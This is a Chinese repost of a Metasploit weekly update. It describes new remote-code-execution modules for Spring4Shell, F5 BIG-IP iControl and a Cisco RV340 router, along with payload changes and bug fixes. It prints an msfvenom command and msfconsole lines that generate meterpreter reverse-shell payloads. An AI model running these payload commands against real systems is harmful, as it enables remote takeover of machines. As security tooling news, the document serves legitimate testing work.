来自Metasploit 每周总结

Spring4Shell 模块

社区贡献者vleminator添加了一个利用CVE-2022-22965（通常称为“Spring4Shell”）的新模块。根据其部署配置，Java Spring Framework 版本 5.3.0 到 5.3.17、5.2.0 到 5.2.19 以及更早版本可能容易受到未经身份验证的远程代码执行的攻击。

F5 BIG-IP iControl RCE 通过 REST 身份验证绕过模块

此外，我们还有一个针对 F5 iControl 并利用CVE-2022-1388的新模块，来自贡献者heyder。此漏洞允许攻击者绕过 iControl 对受影响版本的 REST 身份验证，并通过端点实现未经身份验证的远程代码执行。root/mgmt/tm/util/bash

思科 RV340 SSL VPN RCE 模块

本周最后一个新的 RCE 模块——社区贡献者pedrib添加了一个利用CVE-2022-20699的Cisco RV340 SSL VPN 模块。该模块利用 Cisco RV 系列路由器的默认配置中的堆栈缓冲区溢出，并且不需要身份验证。这个模块也可以在互联网上工作，不需要本地网络访问。

一流的 PowerShell 命令负载

Metasploit 能够执行原生 64 位和 32 位 Windows 有效负载已经有一段时间了。此功能通过 mixin 向模块作者公开，这意味着需要编写一个专用目标。这给想要为本地有效负载的内存代码执行提供 powershell 命令的模块作者增加了额外的开发负担。现在模块作者可以只定义标准命令目标，用户可以选择新的cmd/windows/powershell*有效载荷之一。新适配器将自动将本机代码转换为 powershell 命令，无需模块开发人员的额外努力。

由于这些是新的有效负载模块，它们也可以直接使用 MSFVenom 生成：

./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128

这类似于使用psh-带有现有-f选项的格式化程序之一。但是，由于它是一个有效负载模块，因此可以访问其他Powershell 特定选项。例如，可以对生成的命令进行 base64 编码，以通过设置来删除许多特殊字符Powershell::encode_final_payload=true。

新模块内容（4）

• F5 BIG-IP     iControl RCE 通过Heyder Andrade、James     Horseman、Ron     Bowes 和     alt3kx 的     REST 身份验证绕过，利用CVE-2022-1388 - 为     CVE-2022-1388 添加了一个新模块，这是 F5 BIG- 中的一个漏洞IP 16.1.x 16.1.2.2 之前的版本、15.1.5.1 之前的 15.1.x 版本、14.1.4.6     之前的     14.1.x 版本、13.1.5     之前的     13.1.x 版本以及所有 12.1.x 和 11.6.x版本。通过提出特殊请求，可以绕过 iControl REST 身份验证并获得对管理功能的访问权限。未经身份验证的攻击者可以使用它root在受影响的系统上以用户身份执行任意命令。

• pedrib 的 Cisco RV340 SSL VPN RCE，利用CVE-2022-20699 - 添加了一个新模块，该模块利用 CVE-2022-20699，这是 Cisco RV 340 VPN 网关路由器中未经身份验证的堆栈溢出 RCE 漏洞。成功利用会导致 RCE 成为root用户。此漏洞可以通过 Internet 触发，并且不需要攻击者与受害者位于同一网络上。

• vleminator 的Spring Framework 类属性 RCE (Spring4Shell) ，利用CVE -2022-22965 - 这添加了一个针对 CVE-2022-22965 的模块，这是 Spring Framework 版本 5.3.0 到     5.3.17 的某些安装中的远程代码执行漏洞、5.2.0 到 5.2.19 及更早版本。要容易受到攻击，应用程序必须在 JDK 9+ 上运行，并且在这种情况下，打包并部署为war文件，尽管以后可能会绕过这些限制。

• zeroSteiner的Powershell 命令适配器- 这添加了一个新的有效负载适配器，用于使用 Powershell 将本机 x86 和     x64 Windows 有效负载转换为命令有效负载。

增强功能和功能 (4)

• #16529来自dwelch-r7 - 这更新了     Mettle 有效负载以支持日志记录到文件，现在使用与其他 Meterpreter 相同的选项。例如在 msfconsole 中：

use osx/x64/meterpreter_reverse_tcp
generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'
to_handler

• #16538自adfoster‍-r7- Python Meterpreter 加载程序库已更新，以解决使用Python Meterpreter 加载程序库已更新，以解决使用 Python 3.4 及更高版本运行这些有效负载时显示的弃用警告。

• #16551来自adfoster-r7 - tomcat_mgr_upload.rb     的文档已更新，包含有关设置易受攻击的 Docker 实例以测试模块的附加信息。

• #16553来自mauvehed - 这更新了     Metasploit 的.github/SECURITY.md文件，其中包含在 Rapid7 的开源项目引发安全问题时要遵循的最新步骤。

修复的错误 (8)

• # 16485来自jeffmcjunkin - 这会更新模块的版本检查，exploit/windows/local/s4u_persistence以允许它在更高的 Windows 版本上运行。

• adfoster-r7 中的# 16491 - 这修复了一个错误，即 Meterpreter 会话和模块在遇到超时问题时会因使用无效或已弃用的错误名称而崩溃。

• #16531来自adfoster-r7 - 当需要登录身份验证时，这修复了各种 pihole 模块中的崩溃。

• #16533来自cdelafuente-r7 - 这更新了     Meterpreter reg 命令以正确处理使用-w 32or设置 KEY_WOW64 标志-w 64- 以前这些标志值被无意忽略。

• adfoster-r7 中的# 16540 - 这解决了     Zeitwerk 尝试在启动过程中加载 Go 包的问题。

• #16542来自sjanusz-r7 - 这修复了     msfconsole 内部簿记中的一个错误，以确保不再跟踪关闭的频道。

• 来自adfoster-r7 的#16544 - 这更新了     post 模块windows/gather/ad_to_sqlite以不再崩溃。该模块现在会将提取的信息另外存储为战利品。

• 来自Ronni3X的#16560 - 这更新了nessus_connect登录功能以正确处理@密码中存在的符号。

原文始发于微信公众号（祺印说信安）：来自Metasploit 每周总结